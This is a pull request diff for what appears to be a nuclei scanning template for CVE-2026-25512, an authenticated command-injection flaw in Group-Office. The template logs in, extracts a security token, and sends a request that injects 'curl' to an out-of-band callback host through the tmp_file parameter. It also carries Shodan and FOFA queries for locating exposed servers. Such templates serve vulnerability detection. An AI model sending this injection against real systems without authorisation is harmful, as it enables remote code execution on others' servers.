### PR TITLE
Add CVE-2026-25512 for Group-Office RCE vulnerability

### DIFF
--- a/http/cves/2026/CVE-2026-25512.yaml
+++ b/http/cves/2026/CVE-2026-25512.yaml
@@ -1,7 +1,7 @@
 id: CVE-2026-25512
 
 info:
-  name: Group-Office < 26.0.5 - Remote Code Execution (OS Command Injection)
+  name: Group-Office < 26.0.5 - Remote Code Execution
   author: omarkurt
   severity: critical
   description: |
@@ -29,14 +29,13 @@ info:
     product: group-office
     shodan-query: title:"Group-Office"
     fofa-query: title="Group-Office"
-  tags: cve,cve2026,groupoffice,rce,command-injection,authenticated,critical,oast
+  tags: cve,cve2026,groupoffice,rce,authenticated,oast
 
 variables:
   username: "{{username}}"
   password: "{{password}}"
 
-flow: |
-  http(1) && http(2)
+flow: http(1) && http(2)
 
 http:
   - raw:
@@ -44,11 +43,8 @@ http:
         POST /index.php?r=core/auth/login HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
-        X-Requested-With: XMLHttpRequest
 
         username={{username}}&password={{password}}
-
-    cookie-reuse: true
 
     matchers:
       - type: dsl
@@ -62,9 +58,9 @@ http:
       - type: regex
         name: security_token
         part: body
+        group: 1
         regex:
           - '"security_token":"([^"]+)"'
-        group: 1
         internal: true
 
   - raw:
@@ -72,17 +68,9 @@ http:
         GET /index.php?r=email/message/tnefAttachmentFromTempFile&tmp_file=dummy.dat;curl+{{interactsh-url}};%23&security_token={{security_token}} HTTP/1.1
         Host: {{Hostname}}
 
-    cookie-reuse: true
-
-    matchers-condition: and
     matchers:
-      - type: word
-        part: interactsh_protocol
-        words:
-          - "http"
-          - "dns"
-        condition: or
-
       - type: dsl
         dsl:
           - 'status_code == 200'
+          - 'contains(interactsh_protocol, "dns")'
+        condition: and


### PR DESCRIPTION
Added CVE-2026-25512 details including vulnerability information, impact, remediation steps, and HTTP request flow.

### PR Information

 
- Fixed  Added CVE-2026-25512  
- References: https://vulnerabletarget.com/VT-2026-25512

### Template validation
<img width="1116" height="83" alt="image" src="https://github.com/user-attachments/assets/1d8c0301-1458-4647-9590-a0cef664878e" />
